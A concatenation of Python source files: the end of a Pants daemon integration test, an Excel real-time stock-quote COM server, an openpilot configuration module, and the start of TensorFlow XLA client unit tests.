over bytes from nailgun timed out with timeout interval 0\\.01 starting at {today}T[^\n]+, \
overtime seconds: [^\n]+
Interrupted by user:
Interrupted by user over pailgun client!
"""
.format(today=re.escape(today))],
# NB: Make the timeout very small to ensure the warning message will reliably occur in CI!
quit_timeout=1e-6)
def test_sigint_kills_request_waiting_for_lock(self):
"""
Test that, when a pailgun request is blocked waiting for another one to end,
sending SIGINT to the blocked run will kill it.
Regression test for issue: #7920
"""
config = {'GLOBAL': {
'pantsd_timeout_when_multiple_invocations': -1,
'level': 'debug'
}}
with self.pantsd_test_context(extra_config=config) as (workdir, config, checker):
# Run a repl, so that any other run waiting to acquire the daemon lock waits forever.
first_run_handle = self.run_pants_with_workdir_without_waiting(
command=['repl', 'examples/src/python/example/hello::'],
workdir=workdir,
config=config
)
checker.assert_started()
checker.assert_running()
blocking_run_handle = self.run_pants_with_workdir_without_waiting(
command=['goals'],
workdir=workdir,
config=config
)
# Block until the second request is waiting for the lock.
blocked = True
while blocked:
log = '\n'.join(read_pantsd_log(workdir))
if "didn't aquire the lock on the first try, polling." in log:
blocked = False
# NB: This sleep is totally deterministic, it's just so that we don't spend too many cycles
# busy waiting.
time.sleep(0.1)
# Sends SIGINT to the run that is waiting.
blocking_run_client_pid = blocking_run_handle.process.pid
os.kill(blocking_run_client_pid, signal.SIGINT)
blocking_run_handle.join()
# Check that pantsd is still serving the other request.
checker.assert_running()
# Send exit() to the repl, and exit it.
result = first_run_handle.join(stdin_data='exit()')
self.assert_success(result)
checker.assert_running()
def test_pantsd_environment_scrubbing(self):
# This pair of JVM options causes the JVM to always crash, so the command will fail if the env
# isn't stripped.
with self.pantsd_successful_run_context(
extra_config={'compile.zinc': {'jvm_options': ['-Xmx1g']}},
extra_env={'_JAVA_OPTIONS': '-Xms2g'},
) as (pantsd_run, checker, workdir, _):
pantsd_run(['help'])
checker.assert_started()
result = pantsd_run(['compile', 'examples/src/java/org/pantsbuild/example/hello/simple'])
self.assert_success(result)
def test_pantsd_unicode_environment(self):
with self.pantsd_successful_run_context(
extra_env={'XXX': '¡'},
) as (pantsd_run, checker, workdir, _):
result = pantsd_run(['help'])
checker.assert_started()
self.assert_success(result)
def test_daemon_auto_shutdown_after_first_run(self):
config = {'GLOBAL': {'shutdown_pantsd_after_run': True}}
with self.pantsd_test_context(extra_config=config) as (workdir, config, checker):
wait_handle = self.run_pants_with_workdir_without_waiting(
['list'],
workdir,
config,
)
# TODO(#6574, #7330): We might have a new default timeout after these are resolved.
checker.assert_started(timeout=16)
pantsd_processes = checker.runner_process_context.current_processes()
pants_run = wait_handle.join()
self.assert_success(pants_run)
# Permit enough time for the process to terminate in CI
time.sleep(5)
for process in pantsd_processes:
self.assertFalse(process.is_running())
# This is a regression test for a bug where we would incorrectly detect a cycle if two targets swapped their
# dependency relationship (#7404).
def test_dependencies_swap(self):
template = dedent("""
python_library(
name = 'A',
source = 'A.py',
{a_deps}
)
python_library(
name = 'B',
source = 'B.py',
{b_deps}
)
""")
with self.pantsd_successful_run_context() as (pantsd_run, checker, _, _):
with temporary_dir('.') as directory:
safe_file_dump(os.path.join(directory, 'A.py'), mode='w')
safe_file_dump(os.path.join(directory, 'B.py'), mode='w')
if directory.startswith('./'):
directory = directory[2:]
def list_and_verify():
result = pantsd_run(['list', '{}:'.format(directory)])
checker.assert_started()
self.assert_success(result)
expected_targets = {'{}:{}'.format(directory, target) for target in ('A', 'B')}
self.assertEqual(expected_targets, set(result.stdout_data.strip().split('\n')))
with open(os.path.join(directory, 'BUILD'), 'w') as f:
f.write(template.format(a_deps='dependencies = [":B"],', b_deps=''))
list_and_verify()
with open(os.path.join(directory, 'BUILD'), 'w') as f:
f.write(template.format(a_deps='', b_deps='dependencies = [":A"],'))
list_and_verify()
def test_concurrent_overrides_pantsd(self):
"""
Tests that the --concurrent flag overrides the --enable-pantsd flag,
because we don't allow concurrent runs under pantsd.
"""
config = {'GLOBAL': {'concurrent': True, 'enable_pantsd': True}}
with self.temporary_workdir() as workdir:
pants_run = self.run_pants_with_workdir(['goals'], workdir=workdir, config=config)
self.assert_success(pants_run)
# TODO migrate to pathlib when we cut 1.18.x
pantsd_log_location = os.path.join(workdir, 'pantsd', 'pantsd.log')
self.assertFalse(os.path.exists(pantsd_log_location))
|
td_rtd.py
|
"""Excel RTD (RealTimeData) Server sample for real-time stock quote.
"""
import excel_rtd as rtd
import tdapi as ta
from datetime import datetime
import threading
import pythoncom
import win32api
import win32com.client
from win32com.server.exception import COMException
import logging
import os
import time
import asyncio
import json
from typing import List
LOG_FILE_FOLDER = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'logs')
LOG_FILENAME = os.path.join(LOG_FILE_FOLDER, 'TD_{:%Y%m%d_%H%M%S}.log'.format(datetime.now()))
if not os.path.exists(LOG_FILE_FOLDER):
os.makedirs(LOG_FILE_FOLDER)
logging.basicConfig(
filename=LOG_FILENAME,
level=logging.ERROR,
format="%(asctime)s:%(levelname)s:%(message)s"
)
class TDServer(rtd.RTDServer):
_reg_clsid_ = '{E28CFA65-CC94-455E-BF49-DCBCEBD17154}'
_reg_progid_ = 'TD.RTD'
_reg_desc_ = "RTD server for realtime stock quote"
# other class attributes...
def __init__(self):
super(TDServer, self).__init__()
self.td_cli = ta.create_td_client()
self.start_conn_event = threading.Event()
self.async_loop = None
self.topics_by_key = {}
self.update_thread = threading.Thread(target=self.update_thread_handler)
self.shutdown = False
def OnServerStart(self):
logging.info("OnServerStart Begin")
self.update_thread.start()
while not self.async_loop:
time.sleep(0.1)
def OnServerTerminate(self):
logging.info("OnServerTerminate Begin")
self.shutdown = True
if self.td_cli:
self.td_cli.close()
self.td_cli = None
if not self.start_conn_event.is_set():
self.start_conn_event.set()
if not self.ready_to_send.is_set():
self.ready_to_send.set()
self.start_conn_event.clear()
self.ready_to_send.clear()
def _on_quote_received(self, quotes: List[ta.TDQuote]) -> None:
self.async_loop.call_soon_threadsafe(lambda: self.update_message_queue.put_nowait(quotes))
def update_thread_handler(self) -> None:
logging.info("update_thread_handler start")
try:
pythoncom.CoInitializeEx(pythoncom.COINIT_MULTITHREADED)
asyncio.set_event_loop_policy(asyncio.WindowsProactorEventLoopPolicy())
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
self.async_loop = loop
self.update_message_queue = asyncio.Queue(loop=self.async_loop)
self.send_message_queue = asyncio.Queue(loop=self.async_loop)
self.ready_to_send = asyncio.Event(loop=self.async_loop)
# Following call can cause deadlock if mainthread is not pumping Windows message.
self.SetCallbackThread()
update_msg_coro = self._update_msg_handler()
send_msg_coro = self._send_msg_handler()
loop.run_until_complete(asyncio.gather(update_msg_coro, send_msg_coro))
loop.close()
except Exception as e:
logging.error("update_thread_handler: {}".format(repr(e)))
finally:
pythoncom.CoUninitialize()
#
# _update_msg_handler coro
#
async def _update_msg_handler(self) -> None:
logging.debug("_update_msg_handler: start")
self.start_conn_event.wait()
if self.shutdown:
return
self.td_cli.connect(self._on_quote_received)
self.ready_to_send.set()
logging.debug("_update_msg_handler: ready_to_send.set()")
while not self.shutdown:
quotes = await self.update_message_queue.get()
try:
# Check if any of our topics have new info to pass on
if not len(self.topics):
pass
for quote in quotes:
ticker = quote.ticker
for k, v in quote.fields.items():
if (ticker, k) in self.topics_by_key:
topic = self.topics_by_key[(ticker, k)]
topic.Update(v)
if topic.HasChanged():
self.updatedTopics[topic.topicID] = topic.GetValue()
if self.updatedTopics:
# Retry when com_error occurs
# e.g. RPC_E_SERVERCALL_RETRYLATER = com_error(-2147417846, 'The message filter indicated that the application is busy.', None, None)
while True:
try:
self.SignalExcel()
break
except pythoncom.com_error as error:
await asyncio.sleep(0.01)
except Exception as e:
logging.error("Update: {}".format(repr(e)))
#raise COMException(desc=repr(e))
async def _send_msg_handler(self) -> None:
self.ready_to_send.wait()
logging.debug(f"_send_msg_handler: ready_to_send signalled")
if self.shutdown:
return
while not self.shutdown:
msg = await self.send_message_queue.get()
if msg:
self.td_cli.send(msg)
def CreateTopic(self, TopicId, TopicStrings=None):
"""Topic factory. Builds a StockTickTopic object out of the given TopicStrings."""
if len(TopicStrings) >= 2:
ticker, field = TopicStrings
logging.info(f"CreateTopic {TopicId}, {ticker}|{field}")
if not ticker:
return None
if not self.start_conn_event.is_set():
self.start_conn_event.set()
new_topic = StockTickTopic(TopicId, TopicStrings)
ticker = ticker.upper()
self.topics_by_key[(ticker, field)] = new_topic
subscribe_msg = {
"type": "subscribe",
"symbol": ticker,
"field": field
}
logging.debug(subscribe_msg)
try:
self.async_loop.call_soon_threadsafe(lambda: self.send_message_queue.put_nowait(subscribe_msg))
except Exception as e:
logging.error("CreateTopic: {}".format(repr(e)))
else:
logging.error(f"Unknown param: CreateTopic {TopicId}, {TopicStrings}")
return None
return new_topic
class SimpeVarTopic(rtd.RTDTopic):
def __init__(self, topicID, TopicStrings):
super(SimpeVarTopic, self).__init__(TopicStrings)
try:
cmd, var = self.TopicStrings
self.topicID = topicID
except Exception as e:
raise ValueError("Invalid topic strings: %s" % str(TopicStrings))
# setup our initial value
self.checkpoint = self.timestamp()
self.SetValue(var)
def timestamp(self):
return datetime.now()
def Update(self, value):
self.SetValue(value)
self.checkpoint = self.timestamp()
class StockTickTopic(rtd.RTDTopic):
def __init__(self, topicID, TopicStrings):
super(StockTickTopic, self).__init__(TopicStrings)
try:
ticker, field = self.TopicStrings
self.topicID = topicID
self.ticker = ticker
self.field = field
except Exception as e:
raise ValueError("Invalid topic strings: %s" % str(TopicStrings))
# setup our initial value
self.checkpoint = self.timestamp()
self.SetValue("#WatingDataForData")
def __key(self):
return (self.ticker, self.field)
def __hash__(self):
return hash(self.__key())
def __eq__(self, other):
if isinstance(other, StockTickTopic):
return self.__key() == other.__key()
return NotImplemented
def timestamp(self):
return datetime.now()
def Update(self, value):
self.SetValue(value)
self.checkpoint = self.timestamp()
if __name__ == "__main__":
import win32com.server.register
# Register/Unregister TDServer example
# eg. at the command line: td_rtd.py --register
# Then type in an excel cell something like:
# =RTD("TD.RTD","","MSFT","last-price")
win32com.server.register.UseCommandLine(TDServer)
|
kegman_conf.py
|
import json
import copy
import os
import threading
import time
from selfdrive.swaglog import cloudlog
from common.basedir import BASEDIR
def read_config():
default_config = {"cameraOffset": 0.06, "lastTrMode": 1, "battChargeMin": 90, "battChargeMax": 95,
"wheelTouchSeconds": 1800, "battPercOff": 25, "carVoltageMinEonShutdown": 11200,
"brakeStoppingTarget": 0.25, "angle_steers_offset": 0, "brake_distance_extra": 1,
"lastALCAMode": 1, "brakefactor": 1.2, "lastGasMode": 0, "lastSloMode": 1,
"leadDistance": 5}
if os.path.isfile(kegman_file):
with open(kegman_file, "r") as f:
try:
config = json.load(f)
except:
cloudlog.exception("reading kegman.json error")
config = default_config
if "battPercOff" not in config:
config.update({"battPercOff": 25})
if "carVoltageMinEonShutdown" not in config:
config.update({"carVoltageMinEonShutdown": 11200})
if "brakeStoppingTarget" not in config:
config.update({"brakeStoppingTarget": 0.25})
if "angle_steers_offset" not in config:
config.update({"angle_steers_offset": 0})
if "brake_distance_extra" not in config: # extra braking distance in m
config.update({"brake_distance_extra": 1})
if "lastALCAMode" not in config:
config.update({"lastALCAMode": 1})
if "brakefactor" not in config: # brake at 20% higher speeds than what I like
config.update({"brakefactor": 1.2})
if "lastGasMode" not in config:
config.update({"lastGasMode": 0})
if "lastSloMode" not in config:
config.update({"lastSloMode": 1})
if "leadDistance" not in config: # leadDistance only works for Accord and Insight, have not tested other honda vehicles
config.update({"leadDistance": 5.0})
# force update
if config["carVoltageMinEonShutdown"] == "11800":
config.update({"carVoltageMinEonShutdown": 11200})
if int(config["wheelTouchSeconds"]) < 200:
config.update({"wheelTouchSeconds": 1800})
if int(config["battChargeMin"]) == 85:
config.update({"battChargeMin": 90})
if int(config["battChargeMax"]) == 90:
config.update({"battChargeMax": 95})
else:
write_config(default_config)
config = default_config
return config
def kegman_thread(): # read and write thread; now merges changes from file and variable
global conf
global thread_counter
global variables_written
global thread_started
global last_conf
try:
while True:
thread_counter += 1
time.sleep(thread_interval) # every n seconds check for conf change
with open(kegman_file, "r") as f:
conf_tmp = json.load(f)
if conf != last_conf or conf != conf_tmp: # if either variable or file has changed
thread_counter = 0
if conf_tmp != conf: # if change in file
changed_keys = []
for i in conf_tmp:
try:
if conf_tmp[i] != conf[i]:
changed_keys.append(i)
except: # if new param from file not existing in variable
changed_keys.append(i)
for i in changed_keys:
if i not in variables_written:
conf.update({i: conf_tmp[i]})
if conf != conf_tmp:
write_config(conf)
last_conf = copy.deepcopy(conf)
variables_written = []
if thread_counter > ((thread_timeout * 60.0) / thread_interval): # if no activity in 15 minutes
print("Thread timed out!")
thread_started = False
return
except:
print("Error in kegman thread!")
cloudlog.warning("error in kegman thread")
thread_started = False
def write_config(conf): # never to be called outside kegman_conf
if BASEDIR == "/data/openpilot":
with open(kegman_file, "w") as f:
json.dump(conf, f, indent=2, sort_keys=True)
os.chmod(kegman_file, 0o764)
def save(data): # allows for writing multiple key/value pairs
global conf
global thread_counter
global thread_started
global variables_written
thread_counter = 0
if not thread_started and BASEDIR == "/data/openpilot":
threading.Thread(target=kegman_thread).start() # automatically start write thread if file needs it
thread_started = True
print("Starting thread!")
for key in data:
variables_written.append(key)
conf.update(data)
def get(key_s=""): # can get multiple keys from a list
global thread_counter
if key_s == "": # get all
return conf
else:
thread_counter = 0
if type(key_s) == list:
return [conf[i] if i in conf else None for i in key_s]
if key_s in conf:
return conf[key_s]
else:
return None
thread_counter = 0 # don't change
thread_timeout = 5.0 # minutes to wait before stopping thread. reading or writing will reset the counter
thread_interval = 30.0 # seconds to sleep between checks
thread_started = False
kegman_file = "/data/kegman.json"
variables_written = []
conf = read_config()
last_conf = copy.deepcopy(conf)
|
xla_client_test.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for the Python extension-based XLA client."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import itertools
import threading
from absl.testing import absltest
import numpy as np
from tensorflow.compiler.xla.python import custom_call_for_test
from tensorflow.compiler.xla.python import xla_client
class ComputationTest(absltest.TestCase):
"""Base class for running an XLA Computation through the local client."""
def _NewComputation(self, name=None):
if name is None:
name = self.id()
return xla_client.ComputationBuilder(name)
def _Execute(self, c, arguments):
compiled_c = c.Build().Compile()
return xla_client.execute_with_python_values(compiled_c, arguments)
def _ExecuteAndAssertWith(self, assert_func, c, arguments, expected):
assert expected is not None
result = self._Execute(c, arguments)
# Numpy's comparison methods are a bit too lenient by treating inputs as
# "array-like", meaning that scalar 4 will be happily compared equal to
# [[4]]. We'd like to be more strict so assert shapes as well.
self.assertEqual(np.asanyarray(result).shape, np.asanyarray(expected).shape)
assert_func(result, expected)
def _ExecuteAndCompareExact(self, c, arguments=(), expected=None):
self._ExecuteAndAssertWith(np.testing.assert_equal, c, arguments, expected)
def _ExecuteAndCompareClose(self,
c,
arguments=(),
expected=None,
rtol=1e-7,
atol=0):
self._ExecuteAndAssertWith(
functools.partial(np.testing.assert_allclose, rtol=rtol, atol=atol), c,
arguments, expected)
def NumpyArrayF32(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.float32 dtype."""
return np.array(*args, dtype=np.float32, **kwargs)
def NumpyArrayF64(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.float64 dtype."""
return np.array(*args, dtype=np.float64, **kwargs)
def NumpyArrayS32(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.int32 dtype."""
return np.array(*args, dtype=np.int32, **kwargs)
def NumpyArrayS64(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.int64 dtype."""
return np.array(*args, dtype=np.int64, **kwargs)
def NumpyArrayBool(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.bool dtype."""
return np.array(*args, dtype=np.bool, **kwargs)
class ComputationPrinting(absltest.TestCase):
def ExampleComputation(self):
builder = xla_client.ComputationBuilder("acomputation")
p0 = builder.ParameterFromNumpy(np.float32(0))
p1 = builder.ParameterFromNumpy(np.zeros((4,), np.float32))
builder.Mul(p0, p1)
return builder.Build()
def testComputationToHloText(self):
computation = self.ExampleComputation()
hlo_text = computation.GetHloText()
self.assertTrue(hlo_text.startswith("HloModule acomputation"))
def testComputationToHloGraph(self):
computation = self.ExampleComputation()
hlo_dot_graph = computation.GetHloDotGraph()
self.assertTrue(hlo_dot_graph.startswith("digraph "))
class ComputationsWithConstantsTest(ComputationTest):
"""Tests focusing on Constant ops."""
def testConstantScalarSumS8(self):
c = self._NewComputation()
c.Add(c.Constant(np.int8(1)), c.Constant(np.int8(2)))
self._ExecuteAndCompareExact(c, expected=np.int8(3))
def testConstantScalarSumF32(self):
c = self._NewComputation()
c.Add(c.ConstantF32Scalar(1.11), c.ConstantF32Scalar(3.14))
self._ExecuteAndCompareClose(c, expected=4.25)
def testConstantScalarSumF64(self):
c = self._NewComputation()
c.Add(c.ConstantF64Scalar(1.11), c.ConstantF64Scalar(3.14))
self._ExecuteAndCompareClose(c, expected=4.25)
def testConstantScalarSumS32(self):
c = self._NewComputation()
c.Add(c.ConstantS32Scalar(1), c.ConstantS32Scalar(2))
self._ExecuteAndCompareClose(c, expected=3)
def testConstantScalarSumS64(self):
c = self._NewComputation()
c.Add(c.ConstantS64Scalar(1), c.ConstantS64Scalar(2))
self._ExecuteAndCompareClose(c, expected=3)
def testConstantVectorMulF16(self):
c = self._NewComputation()
c.Mul(
c.Constant(np.array([2.5, 3.3, -1.2, 0.7], np.float16)),
c.Constant(np.array([-1.2, 2, -2, -3], np.float16)))
self._ExecuteAndCompareClose(
c, expected=np.array([-3, 6.6, 2.4, -2.1], np.float16), rtol=2e-3)
def testConstantVectorMulF32(self):
c = self._NewComputation()
c.Mul(
c.Constant(NumpyArrayF32([2.5, 3.3, -1.2, 0.7])),
c.Constant(NumpyArrayF32([-1.2, 2, -2, -3])))
self._ExecuteAndCompareClose(c, expected=[-3, 6.6, 2.4, -2.1])
def testConstantVectorMulF64(self):
c = self._NewComputation()
c.Mul(
c.Constant(NumpyArrayF64([2.5, 3.3, -1.2, 0.7])),
c.Constant(NumpyArrayF64([-1.2, 2, -2, -3])))
self._ExecuteAndCompareClose(c, expected=[-3, 6.6, 2.4, -2.1])
def testConstantVectorScalarDivF32(self):
c = self._NewComputation()
c.Div(
c.Constant(NumpyArrayF32([1.5, 2.5, 3.0, -10.8])),
c.ConstantF32Scalar(2.0))
self._ExecuteAndCompareClose(c, expected=[0.75, 1.25, 1.5, -5.4])
def testConstantVectorScalarDivF64(self):
c = self._NewComputation()
c.Div(
c.Constant(NumpyArrayF64([1.5, 2.5, 3.0, -10.8])),
c.ConstantF64Scalar(2.0))
self._ExecuteAndCompareClose(c, expected=[0.75, 1.25, 1.5, -5.4])
def testConstantVectorScalarPowF32(self):
c = self._NewComputation()
c.Pow(c.Constant(NumpyArrayF32([1.5, 2.5, 3.0])), c.ConstantF32Scalar(2.))
self._ExecuteAndCompareClose(c, expected=[2.25, 6.25, 9.])
def testConstantVectorScalarPowF64(self):
c = self._NewComputation()
c.Pow(c.Constant(NumpyArrayF64([1.5, 2.5, 3.0])), c.ConstantF64Scalar(2.))
self._ExecuteAndCompareClose(c, expected=[2.25, 6.25, 9.])
def testIota(self):
c = self._NewComputation()
c.Iota(np.float32, 10)
self._ExecuteAndCompareExact(c, expected=np.arange(10, dtype=np.float32))
def testBroadcastedIota(self):
c = self._NewComputation()
c.BroadcastedIota(np.int64, (2, 3), 1)
expected = np.array([[0, 1, 2], [0, 1, 2]], dtype=np.int64)
self._ExecuteAndCompareExact(c, expected=expected)
def testBooleanAnd(self):
c = self._NewComputation()
c.And(
c.Constant(NumpyArrayBool([True, False, True, False])),
c.Constant(NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[True, False, False, False])
def testBooleanOr(self):
c = self._NewComputation()
c.Or(
c.Constant(NumpyArrayBool([True, False, True, False])),
c.Constant(NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[True, True, True, False])
def testBooleanXor(self):
c = self._NewComputation()
c.Xor(
c.Constant(NumpyArrayBool([True, False, True, False])),
c.Constant(NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[False, True, True, False])
def testSum2DF32(self):
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6]])),
c.Constant(NumpyArrayF32([[1, -1, 1], [-1, 1, -1]])))
self._ExecuteAndCompareClose(c, expected=[[2, 1, 4], [3, 6, 5]])
def testShiftLeft(self):
c = self._NewComputation()
c.ShiftLeft(c.Constant(NumpyArrayS32([3])), c.Constant(NumpyArrayS32([2])))
self._ExecuteAndCompareClose(c, expected=[12])
def testShiftRightArithmetic(self):
c = self._NewComputation()
c.ShiftRightArithmetic(
c.Constant(NumpyArrayS32([-2])), c.Constant(NumpyArrayS32([1])))
self._ExecuteAndCompareClose(c, expected=[-1])
def testShiftRightLogical(self):
c = self._NewComputation()
c.ShiftRightLogical(
c.Constant(NumpyArrayS32([-1])), c.Constant(NumpyArrayS32([1])))
self._ExecuteAndCompareClose(c, expected=[2**31 - 1])
def testSum2DF64(self):
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF64([[1, 2, 3], [4, 5, 6]])),
c.Constant(NumpyArrayF64([[1, -1, 1], [-1, 1, -1]])))
self._ExecuteAndCompareClose(c, expected=[[2, 1, 4], [3, 6, 5]])
def testSum2DWith1DBroadcastDim0F32(self):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 0 to match the former's shape.
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF32([10, 20, 30])),
broadcast_dimensions=(0,))
self._ExecuteAndCompareClose(
c, expected=[[11, 12, 13], [24, 25, 26], [37, 38, 39]])
def testSum2DWith1DBroadcastDim0F64(self):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 0 to match the former's shape.
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF64([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF64([10, 20, 30])),
broadcast_dimensions=(0,))
self._ExecuteAndCompareClose(
c, expected=[[11, 12, 13], [24, 25, 26], [37, 38, 39]])
def testSum2DWith1DBroadcastDim1F32(self):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 1 to match the former's shape.
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF32([10, 20, 30])),
broadcast_dimensions=(1,))
self._ExecuteAndCompareClose(
c, expected=[[11, 22, 33], [14, 25, 36], [17, 28, 39]])
def testSum2DWith1DBroadcastDim1F64(self):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 1 to match the former's shape.
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF64([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF64([10, 20, 30])),
broadcast_dimensions=(1,))
self._ExecuteAndCompareClose(
c, expected=[[11, 22, 33], [14, 25, 36], [17, 28, 39]])
def testConstantAxpyF32(self):
c = self._NewComputation()
c.Add(
c.Mul(
c.ConstantF32Scalar(2),
c.Constant(NumpyArrayF32([2.2, 3.3, 4.4, 5.5]))),
c.Constant(NumpyArrayF32([100, -100, 200, -200])))
self._ExecuteAndCompareClose(c, expected=[104.4, -93.4, 208.8, -189])
def testConstantAxpyF64(self):
c = self._NewComputation()
c.Add(
c.Mul(
c.ConstantF64Scalar(2),
c.Constant(NumpyArrayF64([2.2, 3.3, 4.4, 5.5]))),
c.Constant(NumpyArrayF64([100, -100, 200, -200])))
self._ExecuteAndCompareClose(c, expected=[104.4, -93.4, 208.8, -189])
def testCustomCall(self):
c = self._NewComputation()
for name, fn in custom_call_for_test.cpu_custom_call_targets.items():
xla_client.register_custom_call_target(name, fn, platform="cpu")
c.CustomCall(
b"test_subtract_f32",
operands=(c.ConstantF32Scalar(1.25), c.ConstantF32Scalar(0.5)),
shape_with_layout=xla_client.Shape.array_shape(
np.dtype(np.float32), (), ()),
operand_shapes_with_layout=(
xla_client.Shape.array_shape(np.dtype(np.float32), (), ()),
xla_client.Shape.array_shape(np.dtype(np.float32), (), ()),
))
self._ExecuteAndCompareClose(c, expected=0.75)
class ParametersTest(ComputationTest):
"""Tests focusing on Parameter ops and argument-passing."""
def setUp(self):
self.f32_scalar_2 = NumpyArrayF32(2.0)
self.f32_4vector = NumpyArrayF32([-2.3, 3.3, -4.3, 5.3])
self.f64_scalar_2 = NumpyArrayF64(2.0)
self.f64_4vector = NumpyArrayF64([-2.3, 3.3, -4.3, 5.3])
self.s32_scalar_3 = NumpyArrayS32(3)
self.s32_4vector = NumpyArrayS32([10, 15, -2, 7])
self.s64_scalar_3 = NumpyArrayS64(3)
self.s64_4vector = NumpyArrayS64([10, 15, -2, 7])
def testScalarTimesVectorAutonumberF32(self):
c = self._NewComputation()
p0 = c.ParameterFromNumpy(self.f32_scalar_2)
p1 = c.ParameterFromNumpy(self.f32_4vector)
c.Mul(p0, p1)
self._ExecuteAndCompareClose(
c,
arguments=[self.f32_scalar_2, self.f32_4vector],
expected=[-4.6, 6.6, -8.6, 10.6])
def testScalarTimesVectorAutonumberF64(self):
c = self._NewComputation()
p0 = c.ParameterFromNumpy(self.f64_scalar_2)
p1 = c.ParameterFromNumpy(self.f64_4vector)
c.Mul(p0, p1)
self._ExecuteAndCompareClose(
c,
arguments=[self.f64_scalar_2, self.f64_4vector],
expected=[-4.6, 6.6, -8.6, 10.6])
def testScalarTimesVectorS32(self):
c = self._NewComputation()
p0 = c.ParameterFromNumpy(self.s32_scalar_3)
p1 = c.ParameterFromNumpy(self.s32_4vector)
c.Mul(p0, p1)
self._ExecuteAndCompareExact(
c,
arguments=[self.s32_scalar_3, self.s32_4vector],
expected=[30, 45, -6, 21])
def testScalarTimesVectorS64(self):
c = self._NewComputation()
p0 = c.ParameterFromNumpy(self.s64_scalar_3)
p1 = c.ParameterFromNumpy(self.s64_4vector)
c.Mul(p0, p1)
self._ExecuteAndCompareExact(
c,
arguments=[self.s64_scalar_3, self.s64_4vector],
expected=[30, 45, -6, 21])
def testScalarMinusVectorExplicitNumberingF32(self):
# Use explicit numbering and pass parameter_num first. Sub is used since
# it's not commutative and can help catch parameter reversal within the
# computation.
c = self._NewComputation()
p1 = c.ParameterFromNumpy(self.f32_4vector, parameter_num=1)
p0 = c.ParameterFromNumpy(self.f32_scalar_2, parameter_num=0)
c.Sub(p1, p0)
self._ExecuteAndCompareClose(
c,
arguments=[self.f32_scalar_2, self.f32_4vector],
expected=[-4.3, 1.3, -6.3, 3.3])
def testScalarMinusVectorExplicitNumberingF64(self):
# Use explicit numbering and pass parameter_num first. Sub is used since
# it's not commutative and can help catch parameter reversal within the
# computation.
c = self._NewComputation()
p1 = c.ParameterFromNumpy(self.f64_4vector, parameter_num=1)
p0 = c.ParameterFromNumpy(self.f64_scalar_2, parameter_num=0)
c.Sub(p1, p0)
self._ExecuteAndCompareClose(
c,
arguments=[self.f64_scalar_2, self.f64_4vector],
expected=[-4.3, 1.3, -6.3, 3.3])
class BufferTest(ComputationTest):
"""Tests focusing on execution with Buffers."""
def _Execute(self, c, arguments):
compiled_c = c.Build().Compile()
arg_buffers = [xla_client.Buffer.from_pyval(arg) for arg in arguments]
result_buffer = compiled_c.Execute(arg_buffers)
return result_buffer.to_py()
def testConstantSum(self):
c = self._NewComputation()
c.Add(c.ConstantF32Scalar(1.11), c.ConstantF32Scalar(3.14))
self._ExecuteAndCompareClose(c, expected=4.25)
def testOneParameterSum(self):
c = self._NewComputation()
c.Add(c.ParameterFromNumpy(NumpyArrayF32(0.)), c.ConstantF32Scalar(3.14))
self._ExecuteAndCompareClose(
c, arguments=[NumpyArrayF32(1.11)], expected=4.25)
def testTwoParameterSum(self):
c = self._NewComputation()
c.Add(
c.ParameterFromNumpy(NumpyArrayF32(0.)),
c.ParameterFromNumpy(NumpyArrayF32(0.)))
self._ExecuteAndCompareClose(
c, arguments=[NumpyArrayF32(1.11),
NumpyArrayF32(3.14)], expected=4.25)
def testCannotCallWithDeletedBuffers(self):
c = self._NewComputation()
c.Add(c.ParameterFromNumpy(NumpyArrayF32(0.)), c.ConstantF32Scalar(3.14))
arg = NumpyArrayF32(1.11)
compiled_c = c.Build().Compile()
arg_buffer = xla_client.Buffer.from_pyval(arg)
arg_buffer.delete()
with self.assertRaises(RuntimeError):
compiled_c.Execute([arg_buffer])
def testDestructureTupleEmpty(self):
t = ()
local_buffer = xla_client.Buffer.from_pyval(t)
pieces = local_buffer.destructure()
self.assertFalse(local_buffer.is_deleted())
self.assertEmpty(pieces)
def testDestructureTupleOneArrayElement(self):
t = (np.array([1, 2, 3, 4], dtype=np.int32),)
local_buffer = xla_client.Buffer.from_pyval(t)
pieces = local_buffer.destructure()
self.assertFalse(local_buffer.is_deleted())
self.assertLen(pieces, 1)
array = pieces[0]
got = array.to_py()
want = NumpyArrayS32([1, 2, 3, 4])
np.testing.assert_equal(want, got)
def testDestructureTupleTwoArrayElementDifferentType(self):
t = (
np.array([1.0, 2.0, 3.0, 4.0], dtype=np.float32),
